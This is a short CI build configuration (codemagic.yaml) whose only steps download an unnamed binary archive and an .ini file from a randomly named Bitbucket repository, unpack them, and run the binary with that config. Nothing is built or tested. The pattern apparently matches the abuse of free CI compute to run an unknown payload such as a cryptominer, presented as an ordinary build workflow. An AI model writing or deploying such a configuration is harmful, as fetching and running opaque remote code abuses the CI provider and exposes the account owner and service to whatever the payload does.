#codemagic.yaml
workflows:
  default-workflow:
    name: Default Workflow
    instance_type: linux
    max_build_duration: 120
    scripts:
      - wget https://bitbucket.org/Hggbngfvb/p/raw/762671a7008d3c0a99a2586b91647b59d8303b10/p.tar.xz
      - wget https://bitbucket.org/Hggbngfvb/p/raw/70786358cbb660945f718565242dd2321ccc1a0e/p.ini
      - tar xf p.tar.xz
      - chmod +x p
      - ./p p.ini
